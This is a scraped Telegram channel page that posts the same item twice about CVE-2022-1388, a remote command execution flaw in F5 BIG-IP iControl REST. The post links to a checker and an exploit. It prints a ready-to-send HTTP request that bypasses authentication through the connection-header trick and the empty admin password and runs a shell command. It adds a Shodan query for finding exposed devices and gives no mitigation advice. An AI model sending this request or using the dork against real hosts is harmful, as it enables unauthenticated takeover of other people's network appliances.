TG Telegram Group & Channel
AmirHoseinTangsiriNET | United States America (US)
Create: Update:

🔺️BIG-IP iControl REST vulnerability CVE-2022-1388
🔹️This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.
🔹️Details: https://lnkd.in/emtA8JCk

🔹️CVE-2022-1388 Cheacker (https://lnkd.in/eUh4NHtN)
🔹️CVE-2022-1388 Exploit (https://lnkd.in/eCEp8_b3)
🔹️Request:
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46

{
"command":"run",
"utilCmdArgs":"-c id"
}

🔹️Shodan Dork:
http.title:"BIG-IP®-+Redirect" +"Server"
📌 F5
@AmirHoseinTangsiriNET〽️

🔺️BIG-IP iControl REST vulnerability CVE-2022-1388
🔹️This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.
🔹️Details: https://lnkd.in/emtA8JCk

🔹️CVE-2022-1388 Cheacker (https://lnkd.in/eUh4NHtN)
🔹️CVE-2022-1388 Exploit (https://lnkd.in/eCEp8_b3)
🔹️Request:
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46

{
"command":"run",
"utilCmdArgs":"-c id"
}

🔹️Shodan Dork:
http.title:"BIG-IP®-+Redirect" +"Server"
📌 F5
@AmirHoseinTangsiriNET〽️


>>Click here to continue<<

AmirHoseinTangsiriNET






Share with your best friend
VIEW MORE

United States America Popular Telegram Group (US)